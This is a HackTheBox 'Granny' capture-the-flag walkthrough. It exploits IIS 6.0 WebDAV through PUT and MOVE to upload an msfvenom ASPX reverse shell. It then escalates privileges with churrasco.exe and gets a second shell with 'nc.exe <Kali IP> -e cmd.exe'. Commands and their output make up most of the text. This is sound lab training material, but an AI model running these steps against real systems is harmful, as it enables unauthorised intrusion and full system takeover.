Granny HackTheBox Walkthrough Without Metasploit

1. Scan the Granny HTB Machine
— nmap -sC -sV -A -O -T4 granny.htb

Nmap scan report for granny.htb (10.129.2.63)
Host is up (0.25s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
| WebDAV type: Unknown
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Date: Fri, 04 Dec 2020 16:26:50 GMT
|_ Server Type: Microsoft-IIS/6.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (92%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_server_2008::sp2>
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows Server 2008 Enterprise SP2 (92%), Microsoft >
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 245.54 ms 10.10.14.1
2 245.56 ms granny.htb (10.129.2.63)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.31 seconds

2. Search for available exploits
— searchsploit iis 6.0

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
Exploit Title | Path
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
Microsoft IIS 4.0/5.0/6.0 — Internal IP Address/Internal Network Name Disclosure | windows/remote/21057.txt
Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) — Remote Stack Overflow | windows/remote/9541.pl
Microsoft IIS 5.0/6.0 FTP Server — Stack Exhaustion Denial of Service | windows/dos/9587.txt
Microsoft IIS 6.0 — ‘/AUX / ‘.aspx’ Remote Denial of Service | windows/dos/3965.pl
Microsoft IIS 6.0 — ASP Stack Overflow Stack Exhaustion (Denial of Service) (MS10–065) | windows/dos/15167.txt
Microsoft IIS 6.0 — WebDAV ‘ScStoragePathFromUrl’ Remote Buffer Overflow | windows/remote/41738.py
Microsoft IIS 6.0 — WebDAV Remote Authentication Bypass (1) | windows/remote/8704.txt
Microsoft IIS 6.0 — WebDAV Remote Authentication Bypass (2) | windows/remote/8806.pl
Microsoft IIS 6.0 — WebDAV Remote Authentication Bypass (Patch) | windows/remote/8754.patch
Microsoft IIS 6.0 — WebDAV Remote Authentication Bypass (PHP) | windows/remote/8765.php
Microsoft IIS 6.0/7.5 (+ PHP) — Multiple Vulnerabilities | windows/remote/19033.txt
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
Shellcodes: No Results

3. Using the 41738.py we got no luck

4. Notice the nmap scan it says we can scan the webdav
— davtest — url http://granny.htb

********************************************************
Testing DAV connection
OPEN SUCCEED: http://granny.htb
********************************************************
NOTE Random string for this session: iGT4hIsd
********************************************************
Creating directory
MKCOL SUCCEED: Created http://granny.htb/DavTestDir_iGT4hIsd
********************************************************
Sending test files
PUT shtml FAIL
PUT cfm SUCCEED: http://granny.htb/DavTestDir_iGT4hIsd/davtest_iGT4hIsd.cfm
PUT asp FAIL
PUT php SUCCEED: http://granny.htb/DavTestDir_iGT4hIsd/davtest_iGT4hIsd.php
PUT pl SUCCEED: http://granny.htb/DavTestDir_iGT4hIsd/davtest_iGT4hIsd.pl
PUT jhtml SUCCEED: http://granny.htb/DavTestDir_iGT4hIsd/davtest_iGT4hIsd.jhtml
PUT txt SUCCEED: http://granny.htb/DavTestDir_iGT4hIsd/davtest_iGT4hIsd.txt
PUT html SUCCEED: http://granny.htb/DavTestDir_iGT4hIsd/davtest_iGT4hIsd.html
PUT aspx FAIL
PUT cgi FAIL
PUT jsp SUCCEED: http://granny.htb/DavTestDir_iGT4hIsd/davtest_iGT4hIsd.jsp
********************************************************
Checking for test file execution
EXEC cfm FAIL
EXEC php FAIL
EXEC pl FAIL
EXEC jhtml FAIL
EXEC txt SUCCEED: http://granny.htb/DavTestDir_iGT4hIsd/davtest_iGT4hIsd.txt
EXEC html SUCCEED: http://granny.htb/DavTestDir_iGT4hIsd/davtest_iGT4hIsd.html
EXEC jsp FAIL

********************************************************
/usr/bin/davtest Summary:
Created: http://granny.htb/DavTestDir_iGT4hIsd
PUT File: http://granny.htb/DavTestDir_iGT4hIsd/davtest_iGT4hIsd.cfm
PUT File: http://granny.htb/DavTestDir_iGT4hIsd/davtest_iGT4hIsd.php
PUT File: http://granny.htb/DavTestDir_iGT4hIsd/davtest_iGT4hIsd.pl
PUT File: http://granny.htb/DavTestDir_iGT4hIsd/davtest_iGT4hIsd.jhtml
PUT File: http://granny.htb/DavTestDir_iGT4hIsd/davtest_iGT4hIsd.txt
PUT File: http://granny.htb/DavTestDir_iGT4hIsd/davtest_iGT4hIsd.html
PUT File: http://granny.htb/DavTestDir_iGT4hIsd/davtest_iGT4hIsd.jsp
Executes: http://granny.htb/DavTestDir_iGT4hIsd/davtest_iGT4hIsd.txt
Executes: http://granny.htb/DavTestDir_iGT4hIsd/davtest_iGT4hIsd.html

5. The davtest and nmap says we can execute html and txt file with PUT and MOVE command so we can upload and rename it inside the machine.

6. Create an exploit to upload
— msfvenom -p windows/shell_reverse_tcp LHOST=lhost LPORT=lport -f aspx -o revshell.aspx

7. Rename the exploit to .txt file, coz we can only upload txt and html file
— mv revshell.aspx revshell.txt

8. Upload the exploit.txt file
— curl -X PUT http://granny.htb/revshell.txt — data-binary @revshell.txt

9. Rename the exploit.txt to revert back to aspx.
— curl -X MOVE — header ‘Destination:http://granny.htb/revshell.aspx' ‘http://granny.htb/revshell.txt'

10. Create a netcat shell to catch the reverse shell from the exploit.
— nc -nlvp 14143

11. Run the exploit via curl command
— curl http://granny.htb/revshell.aspx

12. We got a shell!!!

13. look for the exploit.aspx and goto that folder
— C:\> dir \revshell.aspx /s

dir \revshell.aspx /s
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE

Directory of C:\Inetpub\wwwroot

12/05/2020 12:39 PM 2,729 revshell.aspx
1 File(s) 2,729 bytes

Total Files Listed:
1 File(s) 2,729 bytes
0 Dir(s) 18,125,639,680 bytes free

14. Enable the smbserver on the Kali
— python3 smbserver.py <path> /root

15. Look for available exploit for privilege escalation via Sherlock.ps1 , windows-exploit-suggester or Google

16. After searching for exploit I found the Token Kidnapping Exploit

17. Download the exploit
— Site: https://github.com/Re4son/Churrasco/raw/master/churrasco.exe

18. Upload the churrasco.exe file on the machine

19. Smb server on the Kali is enabled
— copy \\<Kali IP>\bk\churrasco.exe
— copy \\<Kali IP>\bk\nc.exe

20. Run the exploit
— C:\> churrasco.exe whoami
— Result : nt authority/system

21. Create another netcat shell to receive the reverse shell
— nc -nlvp 14144

22. Run the exploit with the nc.exe
— C:\> churrasco.exe -d “C:\> nc.exe <Kali IP> 14144 -e cmd.exe”

23. We got a shell!!!

24. Grab the user.txt and root.txt